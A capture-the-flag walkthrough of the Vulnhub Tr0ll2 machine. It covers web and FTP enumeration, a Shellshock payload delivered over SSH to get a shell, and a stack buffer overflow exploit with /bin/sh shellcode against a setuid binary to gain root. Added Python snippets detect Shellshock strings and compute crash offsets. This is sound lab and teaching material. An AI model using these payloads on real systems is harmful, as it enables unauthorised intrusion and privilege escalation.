Vulnhub Tr0ll2
I enjoyed being trolled the first time so much that I decided to do the second one. Let's send a scan its way.
nmap -sS -sC -p- -T 4 -A 192.168.1.121 -oN nmap_Scan
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-27 04:54 EDT
Nmap scan report for Tr0ll2 (192.168.1.121)
Host is up (0.00024s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 82:fe:93:b8:fb:38:a6:77:b5:a6:25:78:6b:35:e2:a8 (DSA)
| 2048 7d:a5:99:b8:fb:67:65:c9:64:86:aa:2c:d6:ca:08:5d (RSA)
|_ 256 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:F7:66:43 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: Tr0ll; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.24 ms Tr0ll2 (192.168.1.121)
Once again, 21, 22 and 80 are open.
Website
A Nikto scan to begin with.
nikto -h 192.168.1.121
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.121
+ Target Hostname: 192.168.1.121
+ Target Port: 80
+ Start Time: 2017-05-27 04:57:23 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 13079, size: 110, mtime: Tue Oct 14 22:05:15 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8346 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2017-05-27 04:57:34 (GMT-4) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Let's try with dirb.
dirb http://192.168.1.121 /usr/share/wordlists/dirb/common.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat May 27 04:58:55 2017
URL_BASE: http://192.168.1.121/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.121/ ----
+ http://192.168.1.121/cgi-bin/ (CODE:403|SIZE:289)
+ http://192.168.1.121/index (CODE:200|SIZE:110)
+ http://192.168.1.121/index.html (CODE:200|SIZE:110)
+ http://192.168.1.121/robots (CODE:200|SIZE:346)
+ http://192.168.1.121/robots.txt (CODE:200|SIZE:346)
+ http://192.168.1.121/server-status (CODE:403|SIZE:294)
-----------------
END_TIME: Sat May 27 04:58:57 2017
DOWNLOADED: 4612 - FOUND: 6
We got a robots.txt file:
curl 192.168.1.121/robots.txt
User-agent:*
Disallow:
/noob
/nope
/try_harder
/keep_trying
/isnt_this_annoying
/nothing_here
/404
/LOL_at_the_last_one
/trolling_is_fun
/zomg_is_this_it
/you_found_me
/I_know_this_sucks
/You_could_give_up
/dont_bother
/will_it_ever_end
/I_hope_you_scripted_this
/ok_this_is_it
/stop_whining
/why_are_you_still_looking
/just_quit
/seriously_stop
I guess those would be more folders? Let's clean up the file and use it as a wordlist for dirb.
dirb http://192.168.1.121 ./robots.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat May 27 05:02:22 2017
URL_BASE: http://192.168.1.121/
WORDLIST_FILES: ./robots.txt
-----------------
GENERATED WORDS: 21
---- Scanning URL: http://192.168.1.121/ ----
+ http://192.168.1.121//noob (CODE:301|SIZE:313)
+ http://192.168.1.121//keep_trying (CODE:301|SIZE:320)
+ http://192.168.1.121//dont_bother (CODE:301|SIZE:320)
+ http://192.168.1.121//ok_this_is_it (CODE:301|SIZE:322)
-----------------
END_TIME: Sat May 27 05:02:22 2017
DOWNLOADED: 21 - FOUND: 4
Alright, we got some redirects (3XX): two of them have size 320, the other two have sizes 313 and 322.
Each page has a picture. Let's download them and run them through strings; it's a habit I've picked up.
After looking at the strings output and comparing them with diff, we can see that dont_bother has a different image from the other ones.
strings dont_bother.jpg
...
Look Deep within y0ur_self for the answer
This is the only difference between the pictures.
We'll append it to the URL: http://192.168.1.121/y0ur_self
We get another indexed directory with a huge text file called answer.txt. The file has just under 100k lines and looks like... I'm not sure what this is.
So I tried running dirb with the file that was found, and nada.
dirb http://192.168.1.121 ./answer.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat May 27 18:15:50 2017
URL_BASE: http://192.168.1.121/
WORDLIST_FILES: ./answer.txt
-----------------
GENERATED WORDS: 73128
---- Scanning URL: http://192.168.1.121/ ----
-----------------
END_TIME: Sat May 27 18:18:02 2017
DOWNLOADED: 73128 - FOUND: 0
The lines look base64 encoded (because of the "=" padding), so we need to decode all 99k lines with base64 -d:
for i in $(cat answer.txt);do echo $i | base64 -d ;done > decoded_answers.txt
Alright, after a few seconds we got another list with 99k words. They could be passwords, but we don't have a login. I guess more dirb it is.
dirb http://192.168.1.121/ decoded_answers.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun May 28 02:11:58 2017
URL_BASE: http://192.168.1.121/
WORDLIST_FILES: decoded_answers.txt
-----------------
GENERATED WORDS: 73128
---- Scanning URL: http://192.168.1.121/ ----
+ http://192.168.1.121/index (CODE:200|SIZE:110)
+ http://192.168.1.121/robots (CODE:200|SIZE:346)
END_TIME: Sun May 28 02:14:22 2017
DOWNLOADED: 73128 - FOUND: 2
Umm, nothing good. So this is obviously a wordlist, but from where, and what's the point? I know that the OS running on the machine is Ubuntu, so I went and looked for the default wordlists in Ubuntu. You can find one in /etc/dictionaries-common/words. The wordlist starts with the same characters. The problem is that the words file contains "'s" after some words.
So I'll strip those from all the lines, then diff decoded_answers.txt against words.txt.
sed -i "s/'s//g" words.txt
diff words.txt decoded_answers.txt > diff.txt
If we look at diff.txt, we notice a few differences between the files, and some of them look VERY suspicious.
These words really stick out from the rest of them:
ItCantReallyBeThisEasyRightLOL
trollololol
noooob_lol
So these could be more web folders, SSH credentials, or FTP credentials.
After trying all the possible combinations with hydra, I got nothing at all. This is not good. After spending two hours trying to figure out what I missed, I had to look at a guide.
Apparently it was in the FTP part: Tr0ll:Tr0ll is an account based on the hostname of the VM. That's a super long shot that I would never have found.
The FTP server had an lmao.zip:
ftp 192.168.1.121
Connected to 192.168.1.121.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (192.168.1.121:root): Tr0ll
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 1474 Oct 04 2014 lmao.zip
226 Directory send OK.
ftp> get lmao.zip
local: lmao.zip remote: lmao.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lmao.zip (1474 bytes).
226 Transfer complete.
1474 bytes received in 0.00 secs (3.0101 MB/s)
ftp> exit
221 Goodbye.
unzip lmao.zip
[lmao.zip] noob password:
So the zip file needs a password, and ItCantReallyBeThisEasyRightLOL worked. It gives us a file called noob.
file noob
noob: PEM RSA private key
This should be enough to SSH into the machine:
ssh -i noob noob@192.168.1.121
TRY HARDER LOL!
Connection to 192.168.1.121 closed.
Or not…
So I had to look for another hint for this machine: Shellshock exploitation. Read this article, which explains how it works.
http://resources.infosecinstitute.com/practical-shellshock-exploitation-part-1/
So what we needed to do was:
ssh -t -i noob noob@192.168.1.121 '() { :;}; /bin/bash -i'
noob@Tr0ll2:~$ id
uid=1002(noob) gid=1002(noob) groups=1002(noob)
noob@Tr0ll2:~$
cat .bash_history
./bof
./bof @@@@@@@@@@@@
gdb bof
rm bof
ls -al
rm .bash_history
su root
noob@Tr0ll2:~$
Alright we’re in.
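Why the command above works: the noob key appears to be tied to a forced command (presumably what prints "TRY HARDER LOL!" and closes the session; this is an assumption, the page does not show authorized_keys). sshd hands the client's requested command to the login shell in the SSH_ORIGINAL_COMMAND environment variable, and an unpatched bash parses an environment value that starts with "() {" as a function definition and then runs whatever follows the closing "};". The check below is an added Python example, not from the page or the box: it is what a forced-command wrapper or a log review could apply to such values. The environment and the log lines are constructed.

```python
import re

# A Shellshock-style value: a bash function definition "() { ... }" followed
# by ";" and at least one more command. Unpatched bash imported such values
# from the environment and executed the trailing part.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{[^}]*\}\s*;\s*\S")


def looks_like_shellshock(value):
    """True when value carries a function definition with trailing commands."""
    return bool(SHELLSHOCK_RE.search(value))


def suspicious_env_vars(env):
    """Names of environment variables whose value looks like a Shellshock
    payload. A forced-command wrapper can run this on os.environ first."""
    return sorted(name for name, value in env.items() if looks_like_shellshock(value))


def scan_log_lines(lines):
    """Indices of log lines (from a wrapper that logs SSH_ORIGINAL_COMMAND)
    whose quoted command looks like a Shellshock payload."""
    hits = []
    for i, line in enumerate(lines):
        m = re.search(r'SSH_ORIGINAL_COMMAND="([^"]*)"', line)
        if m and looks_like_shellshock(m.group(1)):
            hits.append(i)
    return hits


# Constructed environment as a forced-command wrapper would see it, using
# the command string from the walkthrough.
SAMPLE_ENV = {
    "SSH_ORIGINAL_COMMAND": "() { :;}; /bin/bash -i",
    "TERM": "xterm",
    "LANG": "en_US.UTF-8",
}

# Constructed log lines; only the second carries a payload. The third is a
# bare function definition with nothing after it, which is not an attack.
SAMPLE_LOG = [
    'forced-command: user=noob SSH_ORIGINAL_COMMAND="ls -la"',
    'forced-command: user=noob SSH_ORIGINAL_COMMAND="() { :;}; /bin/bash -i"',
    'forced-command: user=noob SSH_ORIGINAL_COMMAND="() { echo hi; }"',
]

if __name__ == "__main__":
    print("suspicious env vars:", suspicious_env_vars(SAMPLE_ENV))   # ['SSH_ORIGINAL_COMMAND']
    print("suspicious log lines:", scan_log_lines(SAMPLE_LOG))       # [1]
```

The real fix is a patched bash, which no longer imports functions from arbitrary environment variables; the detector is only useful for spotting attempts in logs or refusing them in a wrapper on a host you cannot patch immediately.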
So this time I'll run this script, which can be found here:
https://highon.coffee/blog/linux-local-enumeration-script/
It gives us some valuable information.
It shows us files with the setuid bit set, and these ones were created for us:
drwsr-xr-x 3 root root 4096 May 28 05:00 /nothing_to_see_here
drwsr-xr-x 5 root root 4096 Oct 4 2014 /nothing_to_see_here/choose_wisely
drwsr-xr-x 2 root root 4096 Oct 5 2014 /nothing_to_see_here/choose_wisely/door2
drwsr-xr-x 2 root root 4096 Oct 5 2014 /nothing_to_see_here/choose_wisely/door3
drwsr-xr-x 2 root root 4096 Oct 4 2014 /nothing_to_see_here/choose_wisely/door1
There’s also this.
ls -lha /bin/ls
-rwxrwxrwx 1 root root 103K Mar 31 2012 /bin/ls
So ls is world-writable for some reason…
The right door
So there’s some stuff in the directory /nothing_to_see_here
find . -type f -exec file {} \;
./door2/r00t: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x80ac0ab3dd7ab04707b2fec1a7bca030e20e4654, not stripped
./door3/r00t: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x438546c50f77d4bac3e0c41b4f8bcd60899c4006, not stripped
./door1/r00t: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x4ceb2022ad50bc899c84f5e30793fe06b0a166c0, not stripped
find . -type f -exec ls -l {} \;
-rwsr-xr-x 1 root root 7273 Oct 5 2014 ./door2/r00t
-rwsr-xr-x 1 root root 8401 Oct 5 2014 ./door3/r00t
-rwsr-xr-x 1 root root 7271 Oct 4 2014 ./door1/r00t
We got 3 binaries named r00t, all with the setuid bit set. I'll transfer all of them to the Kali machine and run strings/gdb on them.
The first one, behind door1, shows this when I run strings:
Good job, stand by, executing root shell...
BUHAHAHA NOOB!
/sbin/reboot
;*2$"
So yeah, this one would reboot the machine.
The second one has:
2 MINUTE HARD MODE LOL
/bin/chmod 600 /bin/ls
/bin/chmod 777 /bin/ls
;*2$"
And the third one has:
Usage: %s input
;*2$"
GCC: (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3
bof.c
<built-in>
long long int
strcpy
long long unsigned int
unsigned char
main
/home/noob
GNU C 4.6.3
argc
short unsigned int
exit
bof.c
short int
argv
The third one makes more sense; it also uses strcpy, which is prone to buffer overflows. So I guess a buffer overflow will finish this machine. All of the r00t binaries run as root as well.
After restarting Tr0ll2, it looks like the right binary switches location randomly.
Buffer overflow
So, like always, let's start by making it crash.
We'll create a pattern and pass it as the argument. I'll start with a 128-byte string and slowly raise it until it crashes; it crashed at 400.
pattern_create 400
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y'
gdb-peda$ set args 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y'
[----------------------------------registers-----------------------------------]
EAX: 0x190
EBX: 0x0
ECX: 0x7ffffe6f
EDX: 0xb7fb4870 --> 0x0
ESI: 0xb7fb3000 --> 0x1aedb0
EDI: 0xb7fb3000 --> 0x1aedb0
EBP: 0x64254148 ('HA%d')
ESP: 0xbffff4f0 ("%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
EIP: 0x41332541 ('A%3A')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41332541
[------------------------------------stack-------------------------------------]
0000| 0xbffff4f0 ("%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
0004| 0xbffff4f4 ("eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
0008| 0xbffff4f8 ("A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
0012| 0xbffff4fc ("%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
0016| 0xbffff500 ("5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
0020| 0xbffff504 ("A%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
0024| 0xbffff508 ("%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
0028| 0xbffff50c ("LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41332541 in ?? ()
gdb-peda$ pattern_
pattern_arg pattern_create pattern_env pattern_offset pattern_patch pattern_search
gdb-peda$ pattern_offset 0x41332541
1093870913 found at offset: 268
gdb-peda$
So we got an offset of 268.
Let's double check that the offset is actually right. We'll send "A" * 268 + "B" * 4:
r $(python -c 'print "A" * 268 + "B" * 4')
[----------------------------------registers-----------------------------------]
EAX: 0x110
EBX: 0x0
ECX: 0x7ffffeef
EDX: 0xb7fb4870 --> 0x0
ESI: 0xb7fb3000 --> 0x1aedb0
EDI: 0xb7fb3000 --> 0x1aedb0
EBP: 0x41414141 ('AAAA')
ESP: 0xbffff570 --> 0x0
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xbffff570 --> 0x0
0004| 0xbffff574 --> 0xbffff604 --> 0xbffff738 ("/root/Vulnhub/tr0ll2/door3")
0008| 0xbffff578 --> 0xbffff610 --> 0xbffff864 ("XDG_SESSION_ID=2")
0012| 0xbffff57c --> 0x0
0016| 0xbffff580 --> 0x0
0020| 0xbffff584 --> 0x0
0024| 0xbffff588 --> 0xb7fb3000 --> 0x1aedb0
0028| 0xbffff58c --> 0xb7fffc04 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()
We can see that we've overwritten EIP with B's, so everything is good.
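The offset lookup that peda does for us above, reimplemented as an added Python example (not the author's tooling and not peda's code) so the numbers can be checked: it embeds the 400-byte pattern from pattern_create, turns a crashed register value into the little-endian bytes that overwrote it, and finds them in the pattern, refusing to answer if the 4-byte window is not unique. It also generates the Metasploit-style Aa0Aa1... pattern so the same lookup works when pattern_create is not at hand; that generator, crash_probe and the other helper names are mine, not peda's.

```python
import string

# The pattern_create 400 output from above (copied from the page), split into
# chunks only for readability; it is one 400-byte string.
PEDA_PATTERN = (
    b"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AA"
    b"IAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAA"
    b"RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%"
    b"nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%"
    b"5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%"
    b"qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y"
)


def find_offset(pattern, register_value, width=4):
    """Offset in pattern of the bytes that landed in a register, or None.
    The register is read little-endian, which is how x86 loads it from the
    stack (0x41332541 in EIP means the bytes 'A%3A' sat at that position)."""
    needle = register_value.to_bytes(width, "little")
    offset = pattern.find(needle)
    if offset == -1:
        return None
    if pattern.find(needle, offset + 1) != -1:
        # A repeated window would make the answer ambiguous; use a longer or
        # differently seeded pattern in that case.
        raise ValueError("register bytes occur more than once in the pattern")
    return offset


def msf_pattern(length):
    """Metasploit-style cyclic pattern Aa0Aa1Aa2...: every 3-byte triple is
    distinct, which is what makes the 4-byte lookup above unambiguous."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds the 20280-byte pattern space")


def crash_probe(offset, marker=b"B"):
    """The confirmation input used above: `offset` filler bytes, then a
    4-byte marker that should show up verbatim in EIP if the offset is right."""
    return b"A" * offset + marker * 4


if __name__ == "__main__":
    print("EIP 0x41332541 ->", find_offset(PEDA_PATTERN, 0x41332541))   # 268
    print("EBP 0x64254148 ->", find_offset(PEDA_PATTERN, 0x64254148))   # 264
    print("probe marker   ->", find_offset(crash_probe(268), 0x42424242))  # 268
```

EBP's value maps to offset 264, four bytes below the return address at 268, which is the saved frame pointer of main; together with the clean EIP overwrite and no "stack smashing detected" message, that is consistent with a fixed buffer filled by strcpy with no stack protector. On the binary side the defect is fixed by bounding the copy (strncpy or snprintf with the buffer size) or rejecting an over-long argv[1] before copying it; the program already has a "Usage: %s input" check, so a length check would sit naturally next to it.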
Now we need a return address to put in EIP. We'll go look at where our shellcode sits in memory. I'll add some padding (a NOP sled) to make it easier to spot and easier to land on.
Also, by trial and error I found that there are 161 bytes available after our return address. If we couldn't fit our payload there, we would need an egg hunter. But since we only need a simple shell on the local machine, the shellcode shouldn't be too big.
The shellcode that I'll be using can be found here:
http://shell-storm.org/shellcode/files/shellcode-585.php
So we'll be sending:
r $(python -c 'print "A" * 268 + "XXXX" + "\x90" * 25 + "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"')
And we'll have to see where our shellcode resides.
EAX: 0xbffffa50 ('A' <repeats 200 times>...)
EBX: 0xb7fd1ff4 --> 0x1a5d7c
ECX: 0xbffffe70 ("bin/sh")
EDX: 0xbffffb8c ("bin/sh")
ESI: 0x0
EDI: 0x0
EBP: 0xbffffb58 ("AAAAXXXX\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\353\v[1\300\061\311\061Ұ\v̀\350\360\377\377\377/bin/sh")
ESP: 0xbffffa40 --> 0xbffffa50 ('A' <repeats 200 times>...)
EIP: 0x8048490 (<main+76>: mov eax,0x8048591)
EFLAGS: 0x200202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048484 <main+64>: lea eax,[esp+0x10]
0x8048488 <main+68>: mov DWORD PTR [esp],eax
0x804848b <main+71>: call 0x8048350 <strcpy@plt>
=> 0x8048490 <main+76>: mov eax,0x8048591
0x8048495 <main+81>: lea edx,[esp+0x10]
0x8048499 <main+85>: mov DWORD PTR [esp+0x4],edx
0x804849d <main+89>: mov DWORD PTR [esp],eax
0x80484a0 <main+92>: call 0x8048340 <printf@plt>
[------------------------------------stack-------------------------------------]
0000| 0xbffffa40 --> 0xbffffa50 ('A' <repeats 200 times>...)
0004| 0xbffffa44 --> 0xbffffd34 ('A' <repeats 200 times>...)
0008| 0xbffffa48 --> 0x1
0012| 0xbffffa4c --> 0x8b0
0016| 0xbffffa50 ('A' <repeats 200 times>...)
0020| 0xbffffa54 ('A' <repeats 200 times>...)
0024| 0xbffffa58 ('A' <repeats 200 times>...)
0028| 0xbffffa5c ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
15 in bof.c
gdb-peda$ hexdump $esp 400
0xbffffa40 : 50 fa ff bf 34 fd ff bf 01 00 00 00 b0 08 00 00 P...4...........
0xbffffa50 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffa60 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffa70 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffa80 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffa90 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffaa0 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffab0 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffac0 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffad0 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffae0 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffaf0 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffb00 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffb10 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffb20 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffb30 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffb40 : 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xbffffb50 : 41 41 41 41 41 41 41 41 41 41 41 41 58 58 58 58 AAAAAAAAAAAAXXXX
0xbffffb60 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffb70 : 90 90 90 90 90 90 90 90 90 eb 0b 5b 31 c0 31 c9 ...........[1.1.
0xbffffb80 : 31 d2 b0 0b cd 80 e8 f0 ff ff ff 2f 62 69 6e 2f 1........../bin/
0xbffffb90 : 73 68 00 00 e5 2d 57 54 f5 c9 08 63 00 00 00 00 sh...-WT...c....
0xbffffba0 : 00 00 00 00 00 00 00 00 02 00 00 00 90 83 04 08 ................
0xbffffbb0 : 00 00 00 00 b0 26 ff b7 e9 53 e4 b7 f4 ef ff b7 .....&...S......
0xbffffbc0 : 02 00 00 00 90 83 04 08 00 00 00 00 b1 83 04 08 ................
--More--(25/25)gdb-peda$
We can see here that our NOP sled starts at 0xbffffb60, so I tried that address as the return address. It worked in gdb but didn't work when I ran the binary directly: stack addresses shift a little outside gdb (the environment and argv[0] differ), so an address at the very start of the sled can miss it, while one further in tolerates the shift. After some trial and error, 0xbffffb80 worked perfectly. This is how the final command looks:
./r00t $(python -c 'print "A" * 268 + "\x80\xfb\xff\xbf" + "\x90" * 25 + "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"')
id
uid=1002(noob) gid=1002(noob) euid=0(root) groups=0(root),1002(noob)
whoami
root
This buffer overflow was tricky. I tried using a RET instruction as the return address and couldn't make it work, and lost a lot of time trying to figure it out.
Still, it was pretty fun.